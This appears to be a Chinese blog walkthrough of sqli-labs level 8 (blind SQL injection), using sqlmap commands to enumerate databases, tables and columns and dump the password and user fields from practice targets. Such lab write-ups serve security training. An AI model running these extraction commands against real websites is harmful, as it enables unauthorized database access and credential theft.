第八关还是用到了盲注，我们来使用kali里的sqlmap工具来搞一下。

1.sqlmap简介

sqlmap 是一款开源的自动化 SQL 注入和数据库接管工具，旨在帮助安全研究人员和渗透测试人员检测和利用 SQL 注入漏洞。它支持多种数据库管理系统（如 MySQL、PostgreSQL、Oracle、SQL Server 等），能够自动化检测目标网站或应用的 SQL 注入漏洞，提取数据库信息、列出表格和字段、导出数据，甚至执行系统级命令。sqlmap 还具备绕过防护机制、处理认证和会话管理、盲注攻击等高级功能，是进行数据库安全评估的强大工具。

2.sqlmap的简单使用

2：工具6连注入（附属一张别人的总结）
1.   sqlmap -u  "http://www.xx.com?id=x"    【查询是否存在注入点

2.    sqlmap -u  "http://www.xx.com?id=x" --dbs         【检测站点包含哪些数据库

3.     sqlmap -u  "http://www.xx.com?id=x" --current-db    【获取当前的数据库名

4.     sqlmap -u  "http://www.xx.com?id=x" --tables -D "db_name"  【获取指定数据库中的表名 -D后接指定的数据库名称

5.   sqlmap -u  "http://www.xx.com?id=x" --columns  -T "table_name" -D "db_name"  【获取数据库表中的字段

6.    sqlmap -u  "http://www.xx.com?id=x" --dump -C "columns_name" -T "table_name" -D "db_name"  【获取字段的数据内容

3.现在做题理解一下

1.打开kali

        这一步很重要，吼吼吼吼吼吼吼吼吼吼吼吼吼吼吼

2.爆数据库

sqlmap -u http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-8/?id=1 –dbs

获得数据库为security

3.爆表名

sqlmap -u "http://9f462409-59a4-4180-9019-1b157684a2a2.node5.buuoj.cn/Less-8/?id=1" -D security --tables

 ’

4.爆列名

sqlmap -u "http://9f462409-59a4-4180-9019-1b157684a2a2.node5.buuoj.cn/Less-8/?id=1" -T users -D security --columns 

 

5.爆具体字段

sqlmap -u "http://9f462409-59a4-4180-9019-1b157684a2a2.node5.buuoj.cn/Less-8/?id=1" -C password -T users -D security --dump 
sqlmap -u "http://9f462409-59a4-4180-9019-1b157684a2a2.node5.buuoj.cn/Less-8/?id=1" -C  users -T users -D security --dump 

结束